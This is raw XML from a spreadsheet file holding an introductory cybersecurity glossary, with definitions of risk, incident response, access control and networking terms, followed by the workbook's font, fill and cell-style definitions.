    <t>The decision to attempt to eliminate the risk entirely. (High Risk / High Impact)</t>
  </si>
  <si>
    <t>Risk Impact</t>
  </si>
  <si>
    <t>Overall impact of the business in the event of a breach.</t>
  </si>
  <si>
    <t>Risk Matrix</t>
  </si>
  <si>
    <t>Helps identify priority as the intersection of likelihood of occurrence and impact.</t>
  </si>
  <si>
    <t>Risk Management Framework</t>
  </si>
  <si>
    <t xml:space="preserve"> A structured approach used to oversee and manage risk for an enterprise</t>
  </si>
  <si>
    <t>Risk Mitigation</t>
  </si>
  <si>
    <t>Taking actions to prevent or reduce the possibility of a risk event or its impact.</t>
  </si>
  <si>
    <t>Risk Probability</t>
  </si>
  <si>
    <t>Chance of likelihood of occurrence</t>
  </si>
  <si>
    <t>Risk Tolerance</t>
  </si>
  <si>
    <t>The Level of risk an entity assumes in efforts to achieve a result.</t>
  </si>
  <si>
    <t>Risk Transference</t>
  </si>
  <si>
    <t>Practice of passing the risk to another party. (Insurance Policy equivalent)</t>
  </si>
  <si>
    <t>Risk Treatment</t>
  </si>
  <si>
    <t>Making decisions about the best actions to take regarding the identified and prioritized risk.</t>
  </si>
  <si>
    <t>Threat</t>
  </si>
  <si>
    <t>Something or someone that aims to exploit a vulnerability to thwart protection efforts.</t>
  </si>
  <si>
    <t>Threat Actor</t>
  </si>
  <si>
    <t>An individual or a group that attempts to exploit vulnerabilities to cause or force a threat to occur.</t>
  </si>
  <si>
    <t>Threat Vector</t>
  </si>
  <si>
    <t>The means by which a threat actor carries out their objectives.</t>
  </si>
  <si>
    <t>Gap or weakness of an asset that fails to be protected.</t>
  </si>
  <si>
    <t>Policies, Procedures, Standards, Regulations, and Laws</t>
  </si>
  <si>
    <t>Governance</t>
  </si>
  <si>
    <t>The process of how an organization is managed;</t>
  </si>
  <si>
    <t>Institute of Electrical and Electronics Engineers (IEEE)</t>
  </si>
  <si>
    <t>Standards organization that sets standards for telecommunications, computer engineering and similar disciplines.</t>
  </si>
  <si>
    <t>International Organization for Standardization (ISO)</t>
  </si>
  <si>
    <t>Standards entity that develops and publishes international standards on a variety of technical subjects, including information systems and information security, as well as encryption standards.</t>
  </si>
  <si>
    <t>Internet Engineering Task Force (IETF)</t>
  </si>
  <si>
    <t>The Internet Standards Organisation, consistinging of developers, operators and vendors that define the protocol standards over the Internet. EG. IP, TCP, DNS.</t>
  </si>
  <si>
    <t>National Institute of Standards and Technology (NIST)</t>
  </si>
  <si>
    <t>United States government agency under the Department of Commerce and publishes a variety of technical standards in addition to information technology and information security standards.</t>
  </si>
  <si>
    <t>Policies</t>
  </si>
  <si>
    <t>Put in place by organizational governance, such as executive management, to provide guidance in all activities to ensure that the organization supports industry standards and regulations.</t>
  </si>
  <si>
    <t>Detailed steps to complete a task that support departmental or organizational policies.</t>
  </si>
  <si>
    <t>Regulations and Laws</t>
  </si>
  <si>
    <t>Issued in the form of laws, usually from government and typically carry financial penalties for noncompliance.</t>
  </si>
  <si>
    <t>Standards</t>
  </si>
  <si>
    <t>Used by governance teams to provide a framework to introduce policies and procedures in support of regulations.</t>
  </si>
  <si>
    <t>Breach</t>
  </si>
  <si>
    <t>The loss of control, compromise, unauthorized disclosure, unauthorized acquisition, or any similar occurrence where: a person other than an authorized user accesses or potentially accesses personally identifiable information; or an authorized user accesses personally identifiable information for other than an authorized purpose.</t>
  </si>
  <si>
    <t>Chapter 2: Incident Response, Business Continuity and Disaster Recovery Concepts</t>
  </si>
  <si>
    <t>Event</t>
  </si>
  <si>
    <t>Any observable occurrence in a network or system.</t>
  </si>
  <si>
    <t>Exploit</t>
  </si>
  <si>
    <t>A particular attack. It is named this way because these attacks exploit system vulnerabilities.</t>
  </si>
  <si>
    <t>Incident</t>
  </si>
  <si>
    <t>An event that actually or potentially jeopardizes the confidentiality, integrity or availability of an information system or the information the system processes, stores or transmits.</t>
  </si>
  <si>
    <t>Intrusion</t>
  </si>
  <si>
    <t>A security event, or combination of events, that constitutes a deliberate security incident in which an intruder gains, or attempts to gain, access to a system or system resource without authorization.</t>
  </si>
  <si>
    <t>Any circumstance or event with the potential to adversely impact organizational operations through an information system via unauthorized access, destruction, disclosure, modification of information and/or denial of service.</t>
  </si>
  <si>
    <t>Weakness in an information system, system security procedures, internal controls or implementation that could be exploited by a threat source.</t>
  </si>
  <si>
    <t>Zero Day</t>
  </si>
  <si>
    <t>A previously unknown system vulnerability with the potential of exploitation without risk of detection or prevention because it does not, in general, fit recognized patterns, signatures or methods.</t>
  </si>
  <si>
    <t>Adverse Events</t>
  </si>
  <si>
    <t>Events with negative consequences.</t>
  </si>
  <si>
    <t>Incident Response (IR)</t>
  </si>
  <si>
    <t>Goal of Protecting life, health and safety.</t>
  </si>
  <si>
    <t>Incident Management</t>
  </si>
  <si>
    <t>Goal of being prepared for an incident</t>
  </si>
  <si>
    <t>Incident Response Plan (IRP)</t>
  </si>
  <si>
    <t>The documentation of a predetermined set of instructions or procedures, to detect, respond to and limit consequences of an attack.</t>
  </si>
  <si>
    <t>Security operations Centre (SOC)</t>
  </si>
  <si>
    <t xml:space="preserve">A team of IT professionals that monitor security events that happen within the operations of the business. </t>
  </si>
  <si>
    <t>Computer Incident Response Teams (CIRTs)</t>
  </si>
  <si>
    <t>Dedicated team responsible for investigating any computer security incidents that take place.</t>
  </si>
  <si>
    <t>Business Impact Planning</t>
  </si>
  <si>
    <t>Procative development of proceduresto restore business operations after a disaster or dignificant disruption to an organisation.</t>
  </si>
  <si>
    <t>Business Continuity</t>
  </si>
  <si>
    <t>Business Impact Analysis (BIA)</t>
  </si>
  <si>
    <t>An analysis of an information system's requirements, functions, and interdependencies, used to characterize system contingency, requirements and priorities in the event of a significant disruption.</t>
  </si>
  <si>
    <t>Disaster Recovery</t>
  </si>
  <si>
    <t>The activities necessary to restore IT and communications services to an organisation during and after an outage, disruption, or disturbance.</t>
  </si>
  <si>
    <t>The process, policies, and procedures involved in preparing for business related outage, disruption, and disturbance.</t>
  </si>
  <si>
    <t>Disaster Recovery Plan Components</t>
  </si>
  <si>
    <t>Executive Summary, Department specific plans, Technical guides for IT personnel responsibilities, Full copies of plan, and Checklists for certain personnel.</t>
  </si>
  <si>
    <t>Security Control:</t>
  </si>
  <si>
    <t>A safeguard or countermeasure designed to preserve CIA of data.</t>
  </si>
  <si>
    <t>Access Control Concepts</t>
  </si>
  <si>
    <t>Chapter 3: Access Control Concepts</t>
  </si>
  <si>
    <t>Access Control</t>
  </si>
  <si>
    <t>Granting the appropriate level of access to authorized personnel and processes, and denighing access to unauthorized fornctions or individuals.</t>
  </si>
  <si>
    <t>Subject</t>
  </si>
  <si>
    <t>Any entity that requests access to an asset. (User, Client, Process/Program).</t>
  </si>
  <si>
    <t>Object</t>
  </si>
  <si>
    <t>Anything a subject attempts to access.</t>
  </si>
  <si>
    <t>Rules</t>
  </si>
  <si>
    <t xml:space="preserve">An instruction developed to allow or deny access to a system by comparing the validated identity of the subject to an access control list. </t>
  </si>
  <si>
    <t>Layered Defense / Defense in Depth</t>
  </si>
  <si>
    <t>Tangible controls that aim to safeguard and countermeasure against threats. CCTV cameras, motion sensors, intruder alarms and smart alerting.</t>
  </si>
  <si>
    <t>The hardware and software components that protect a system against cyberattack. Firewalls, intrusion detection systems (IDS), encryption, and identification and authentication mechanisms are examples of technical controls</t>
  </si>
  <si>
    <t>The policies, standards, and procedures that are put in place to manage and protect a data center.</t>
  </si>
  <si>
    <t>Principal of Least Privilege</t>
  </si>
  <si>
    <t>Assigning the minimum access levels to an authorized user to achieve their tasks.</t>
  </si>
  <si>
    <t xml:space="preserve">Privileged Access Management
</t>
  </si>
  <si>
    <t>An information security mechanism that safeguards identities with special access or capabilities beyond regular users.</t>
  </si>
  <si>
    <t xml:space="preserve"> Just-in-time Privileged Access Management</t>
  </si>
  <si>
    <t>Includes role-based specific subsets of privileges that only become active in real time when the identity is requesting the use of a resource or service.</t>
  </si>
  <si>
    <t>User Provisioning</t>
  </si>
  <si>
    <t xml:space="preserve">The process of creating, maintaining, and deactivating user accounts on a system. </t>
  </si>
  <si>
    <t>Privileged Accounts</t>
  </si>
  <si>
    <t>Accounts with permissions beyond those of a normal user, such as managers and admins.</t>
  </si>
  <si>
    <t>Logging</t>
  </si>
  <si>
    <t>Collecting and storing user activites in the information system in a readable file.</t>
  </si>
  <si>
    <t>Log Anomaly</t>
  </si>
  <si>
    <t>A system irregularity that is identified when studying log entries which could represent events of interest for further surveillance.</t>
  </si>
  <si>
    <t>Audittting</t>
  </si>
  <si>
    <t>Review and examination of records and activities to assess a systems state.</t>
  </si>
  <si>
    <t>Segregation of Duties</t>
  </si>
  <si>
    <t xml:space="preserve">The practice of ensuring that an organisational process cannot be completed by a single person. A high-risk transaction may be carried out by multiple people during the transaction process. </t>
  </si>
  <si>
    <t>Collusion</t>
  </si>
  <si>
    <t>When two or more individuals work together to bypass the segregation of duties to jointly commit in fraud. (insiders)</t>
  </si>
  <si>
    <t>Dual Control Segregation of Duties</t>
  </si>
  <si>
    <t>When two or more individuals must work together to commit an attack using 2 different sets of information. Supports Non-Repudiation</t>
  </si>
  <si>
    <t>Two-Person Integrity</t>
  </si>
  <si>
    <t>A security strategy that requires a minimum of two people to be in an area together, to deter an individual from commiting in acts alone in a space.</t>
  </si>
  <si>
    <t>Insider Threats</t>
  </si>
  <si>
    <t xml:space="preserve">An entity that authorized access that has the potential to cause harm to an information system, through destruction, disclosure, and modifiation of data. </t>
  </si>
  <si>
    <t>Crime Prevention through Environmental Design (CPTED)</t>
  </si>
  <si>
    <t>Creating safer workspaces through passive design elements</t>
  </si>
  <si>
    <t xml:space="preserve"> Physical Access Controls </t>
  </si>
  <si>
    <t>Tangible methods or mechanisms that limit someone from getting access to an area or asset</t>
  </si>
  <si>
    <t>Physical Access Controls</t>
  </si>
  <si>
    <t>logs</t>
  </si>
  <si>
    <t>sign-in sheet maintained by a security guard, or even a log created by an electronic system that manages physical access.</t>
  </si>
  <si>
    <t>Logical Access Controls</t>
  </si>
  <si>
    <t>Electronic methods that limit someone from getting access to systems, and sometimes even to tangible assets or areas.</t>
  </si>
  <si>
    <t>Discretionary Access Control (DAC)</t>
  </si>
  <si>
    <t xml:space="preserve">Owners or other authorized personnel that has control over an object's access. </t>
  </si>
  <si>
    <t>Mandatory Access Control (MAC)</t>
  </si>
  <si>
    <t>Access control that requires the system itself to manage access controls in accordance with the organisation's security policies.</t>
  </si>
  <si>
    <t>Role-Based Access Control (RBAC)</t>
  </si>
  <si>
    <t>Sets up user permissions based on their roles. Each role represents users with similar or identical permissions.</t>
  </si>
  <si>
    <t>Hardware:</t>
  </si>
  <si>
    <t>Physical components of a system.</t>
  </si>
  <si>
    <t>Computer Networking:</t>
  </si>
  <si>
    <t>Chapter 4: Network Security</t>
  </si>
  <si>
    <t>Software:</t>
  </si>
  <si>
    <t>Computer programs and associated data of a system.</t>
  </si>
  <si>
    <t>Porotocols:</t>
  </si>
  <si>
    <t>A set of rules to implement and control some types of association between systems.</t>
  </si>
  <si>
    <t>Act of converting plaintext into cyphertext.</t>
  </si>
  <si>
    <t>LAN:</t>
  </si>
  <si>
    <t xml:space="preserve">Network typically spanning a single foor or building, limited geographical area. </t>
  </si>
  <si>
    <t>WAN:</t>
  </si>
  <si>
    <t xml:space="preserve">Long-Distance connections between geographically remote networks. </t>
  </si>
  <si>
    <t xml:space="preserve">Connects multiple PCs to a single network. </t>
  </si>
  <si>
    <t>Connects multiple PCs to the network. Routes traffic to port/device rather than restransmitting to all devices.</t>
  </si>
  <si>
    <t>Control traffic flow in and out of networks, and to connect similar networks together. Most efficient route.</t>
  </si>
  <si>
    <t>Controls network traffic and protects the network using set of rules (filters).</t>
  </si>
  <si>
    <t>Server:</t>
  </si>
  <si>
    <t>Provides information to other computers on network. Web server, email server, print server, database server.</t>
  </si>
  <si>
    <t>Endpoint:</t>
  </si>
  <si>
    <t>Endpoints of network, eg Server and Client.</t>
  </si>
  <si>
    <t>Broadcast Transmission:</t>
  </si>
  <si>
    <t>One-to-many form of sending internet traffic.</t>
  </si>
  <si>
    <t>Virtual Local Area Network (VLANs):</t>
  </si>
  <si>
    <t>A logical group of workstations, servers, and network devices that appear to be on the same LAN despite their geographical distribution.</t>
  </si>
  <si>
    <t>MAC Addresses:</t>
  </si>
  <si>
    <t>Network Interface Module inside of a machine indicating the unique id of the machine on the same LAN.</t>
  </si>
  <si>
    <t>Ethernet (IEEE 802.3):</t>
  </si>
  <si>
    <t>A standarad that defines wired connections of network devices, and explains the way data is formatted over the wire to ensure disparate devices can communicate over the same cable</t>
  </si>
  <si>
    <t>Bytes:</t>
  </si>
  <si>
    <t>8 bits</t>
  </si>
  <si>
    <t>IP address:</t>
  </si>
  <si>
    <t xml:space="preserve">Unique logical address given out by the router.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</si>
</sst>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yyyy"/>
  </numFmts>
  <fonts count="53">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="19.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="16.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="16.0"/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <sz val="16.0"/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <sz val="16.0"/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <sz val="16.0"/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <sz val="16.0"/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <sz val="16.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="16.0"/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <sz val="16.0"/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <color rgb="FFFEF8E3"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <b/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FFFFFFFF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <b/>
      <sz val="16.0"/>
      <color rgb="FFFEF8E3"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <b/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="15.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="15.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF222222"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="12.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font/>
    <font>
      <sz val="15.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="12.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <b/>
      <color rgb="FFFEF8E3"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FFFEF8E3"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Source Code Pro"/>
    </font>
  </fonts>
  <fills count="40">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF000000"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA2C4C9"/>
        <bgColor rgb="FFA2C4C9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9EAD3"/>
        <bgColor rgb="FFD9EAD3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFCE5CD"/>
        <bgColor rgb="FFFCE5CD"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D2E9"/>
        <bgColor rgb="FFD9D2E9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF7CB4D"/>
        <bgColor rgb="FFF7CB4D"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF434343"/>
        <bgColor rgb="FF434343"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor rgb="FFFFFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFEF8E3"/>
        <bgColor rgb="FFFEF8E3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF6D9EEB"/>
        <bgColor rgb="FF6D9EEB"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFEFEF"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF9CB9C"/>
        <bgColor rgb="FFF9CB9C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4A86E8"/>
        <bgColor rgb="FF4A86E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF8E7CC3"/>
        <bgColor rgb="FF8E7CC3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF6B26B"/>
        <bgColor rgb="FFF6B26B"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEA9999"/>
        <bgColor rgb="FFEA9999"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB4A7D6"/>
        <bgColor rgb="FFB4A7D6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB6D7A8"/>
        <bgColor rgb="FFB6D7A8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA4C2F4"/>
        <bgColor rgb="FFA4C2F4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF4CCCC"/>
        <bgColor rgb="FFF4CCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDD7E6B"/>
        <bgColor rgb="FFDD7E6B"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF6FA8DC"/>
        <bgColor rgb="FF6FA8DC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD0E0E3"/>
        <bgColor rgb="FFD0E0E3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF76A5AF"/>
        <bgColor rgb="FF76A5AF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF93C47D"/>
        <bgColor rgb="FF93C47D"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC27BA0"/>
        <bgColor rgb="FFC27BA0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE6B8AF"/>
        <bgColor rgb="FFE6B8AF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC9DAF8"/>
        <bgColor rgb="FFC9DAF8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF9900"/>
        <bgColor rgb="FFFF9900"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB7B7B7"/>
        <bgColor rgb="FFB7B7B7"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD8E5F8"/>
        <bgColor rgb="FFD8E5F8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8"/>
        <bgColor theme="8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF9FC5E8"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE06666"/>
        <bgColor rgb="FFE06666"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9"/>
        <bgColor theme="9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF6AA84F"/>
        <bgColor rgb="FF6AA84F"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF45818E"/>
        <bgColor rgb="FF45818E"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="10">
    <border/>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <bottom style="thick">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2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="3" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="4" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="3" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="6" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="3" fillId="5" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="6" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="5" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="4" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="6" fillId="5" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="7" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="11" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="11" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
